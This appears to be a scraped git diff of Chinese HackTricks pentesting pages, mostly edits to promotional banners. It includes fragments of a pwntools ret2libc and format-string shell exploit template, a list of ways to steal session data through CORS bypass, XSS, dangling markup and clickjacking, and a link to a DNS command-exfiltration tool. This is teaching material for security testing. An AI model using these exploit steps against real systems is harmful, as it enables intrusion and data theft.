* [**Slackhound**](https://github.com/BojackThePillager/Slackhound):Slackhound 是一个命令行工具,供红队和蓝队快速对 Slack 工作区/组织执行侦察。Slackhound 使组织的用户、文件、消息等的收集快速可搜索,并将大型对象写入 CSV 以供离线审查。
|
||||
|
||||
{% hint style="success" %}
|
||||
学习和实践AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习和实践GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为英雄</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
|
||||
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
|
||||
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。**
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,16 +1,17 @@
|
|||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
```python
|
||||
from pwn import *
|
||||
from time import sleep
|
||||
|
@ -149,16 +150,17 @@ format_string.execute_writes()
|
|||
|
||||
P.interactive()
|
||||
```
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,16 +1,17 @@
|
|||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持HackTricks</summary>
|
||||
|
||||
其他支持HackTricks的方式:
|
||||
|
||||
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
{% code title="template.py" %}
|
||||
|
@ -201,9 +202,9 @@ P.interactive() #Interact with your shell :)
|
|||
|
||||
# 常见问题
|
||||
|
||||
## 未找到 MAIN_PLT = elf.symbols\['main']
|
||||
## MAIN\_PLT = elf.symbols\['main'] 未找到
|
||||
|
||||
如果"main"符号不存在。那么你可以找到主要代码的位置:
|
||||
如果"main"符号不存在(可能是因为它是一个被剥离符号的二进制文件)。那么你可以找到主代码的位置:
|
||||
```python
|
||||
objdump -d vuln_binary | grep "\.text"
|
||||
Disassembly of section .text:
|
||||
|
@ -213,28 +214,29 @@ Disassembly of section .text:
|
|||
```python
|
||||
MAIN_PLT = 0x401080
|
||||
```
|
||||
## 未找到Puts
|
||||
## Puts 未找到
|
||||
|
||||
如果二进制文件没有使用Puts,您应该检查是否使用了
|
||||
如果二进制文件没有使用 Puts,您应该检查它是否使用
|
||||
|
||||
## `sh: 1: %s%s%s%s%s%s%s%s: 未找到`
|
||||
## `sh: 1: %s%s%s%s%s%s%s%s: not found`
|
||||
|
||||
如果在创建所有利用后发现此**错误**:`sh: 1: %s%s%s%s%s%s%s%s: 未找到`
|
||||
如果在创建所有利用后发现这个 **错误**:`sh: 1: %s%s%s%s%s%s%s%s: not found`
|
||||
|
||||
尝试**从"/bin/sh"的地址中减去64字节**:
|
||||
尝试**从 "/bin/sh" 的地址减去 64 字节**:
|
||||
```python
|
||||
BINSH = next(libc.search("/bin/sh")) - 64
|
||||
```
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,37 +1,39 @@
|
|||
# 从网页中窃取敏感信息泄露
|
||||
# 从网络中窃取敏感信息泄露
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客攻击直到成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF版本**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方的PEASS & HackTricks商品**](https://peass.creator-spring.com)
|
||||
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
|
||||
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。**
|
||||
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
如果你在某个时刻发现一个**基于你的会话向你展示敏感信息的网页**:可能它在反映cookies,或打印信用卡细节或任何其他敏感信息,你可能会尝试窃取它。\
|
||||
这里我向你介绍主要的方法来尝试实现它:
|
||||
如果你在某个时刻发现一个**网页根据你的会话呈现敏感信息**:也许它反射了 cookie,或打印了信用卡详细信息或其他敏感信息,你可以尝试窃取它。\
|
||||
这里我向你介绍了主要的尝试方法:
|
||||
|
||||
* [**CORS绕过**](pentesting-web/cors-bypass.md):如果你能绕过CORS头,你将能够通过恶意页面执行Ajax请求来窃取信息。
|
||||
* [**XSS**](pentesting-web/xss-cross-site-scripting/):如果你在页面上发现了XSS漏洞,你可能能够利用它来窃取信息。
|
||||
* [**悬空标记**](pentesting-web/dangling-markup-html-scriptless-injection/):如果你不能注入XSS标签,你仍然可能使用其他常规HTML标签来窃取信息。
|
||||
* [**点击劫持**](pentesting-web/clickjacking.md):如果没有防护措施,你可能能够诱导用户向你发送敏感数据(一个例子[这里](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20))。
|
||||
* [**CORS 绕过**](pentesting-web/cors-bypass.md):如果你可以绕过 CORS 头,你将能够通过对恶意页面执行 Ajax 请求来窃取信息。
|
||||
* [**XSS**](pentesting-web/xss-cross-site-scripting/):如果你在页面上发现了 XSS 漏洞,你可能可以滥用它来窃取信息。
|
||||
* [**悬挂标记**](pentesting-web/dangling-markup-html-scriptless-injection/):如果你无法注入 XSS 标签,你仍然可以使用其他常规 HTML 标签来窃取信息。
|
||||
* [**Clickjaking**](pentesting-web/clickjacking.md):如果没有防护措施防止这种攻击,你可能可以欺骗用户发送给你敏感数据(一个示例[在这里](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20))。
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客攻击直到成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF版本**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方的PEASS & HackTricks商品**](https://peass.creator-spring.com)
|
||||
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
|
||||
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。**
|
||||
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,13 +1,14 @@
|
|||
{% hint style="success" %}
|
||||
学习和实践AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习和实践GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为英雄级人物</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
其他支持HackTricks的方式:
|
||||
|
||||
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF版本**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边商品**](https://peass.creator-spring.com)
|
||||
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
|
||||
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来**分享您的黑客技巧**。
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,43 +1,44 @@
|
|||
{% hint style="success" %}
|
||||
学习和实践AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习和实践GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客攻击成为英雄</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在**HackTricks中看到您的公司广告**或**以PDF格式下载HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
|
||||
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)的github仓库提交PR来**分享您的黑客技巧**。
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
# 基本有效载荷
|
||||
|
||||
# 基础载荷
|
||||
|
||||
* **简单列表:** 只包含每行一个条目的列表
|
||||
* **运行时文件:** 运行时读取的列表(不加载到内存中)。支持大型列表。
|
||||
* **大小写修改:** 对字符串列表应用一些更改(不更改,转为小写,转为大写,转为首字母大写其余小写,转为首字母大写其余保持不变)。
|
||||
* **数字:** 使用Z步长或随机生成从X到Y的数字。
|
||||
* **简单列表:** 每行包含一个条目的列表
|
||||
* **运行时文件:** 在运行时读取的列表(不加载到内存中)。用于支持大型列表。
|
||||
* **大小写修改:** 对字符串列表应用一些更改(无更改,转为小写,转为大写,转为 Proper 名称 - 首字母大写,其余小写 -,转为 Proper 名称 - 首字母大写,其余保持不变 -。
|
||||
* **数字:** 使用 Z 步长从 X 到 Y 生成数字或随机生成。
|
||||
* **暴力破解器:** 字符集,最小和最大长度。
|
||||
|
||||
[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : 通过DNS请求到burpcollab执行命令并获取输出的载荷。
|
||||
[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator):通过 DNS 请求执行命令并获取输出的有效载荷到 burpcollab。
|
||||
|
||||
{% embed url="https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e" %}
|
||||
|
||||
[https://github.com/h3xstream/http-script-generator](https://github.com/h3xstream/http-script-generator)
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
学习和实践AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习和实践GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客攻击成为英雄</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在**HackTricks中看到您的公司广告**或**以PDF格式下载HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
|
||||
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)的github仓库提交PR来**分享您的黑客技巧**。
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,29 +1,35 @@
|
|||
# 电子邮件漏洞
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
* 你在一家**网络安全公司**工作吗?想要在HackTricks中看到你的**公司广告**吗?或者想要获得**PEASS的最新版本或下载HackTricks的PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 发现我们的独家[**NFT收藏品The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
||||
* 获得[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram群组**](https://t.me/peass),或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
||||
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
|
||||
|
||||
</details>
|
||||
|
||||
##
|
||||
|
||||
##
|
||||
{% hint style="success" %}
|
||||
学习并练习 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
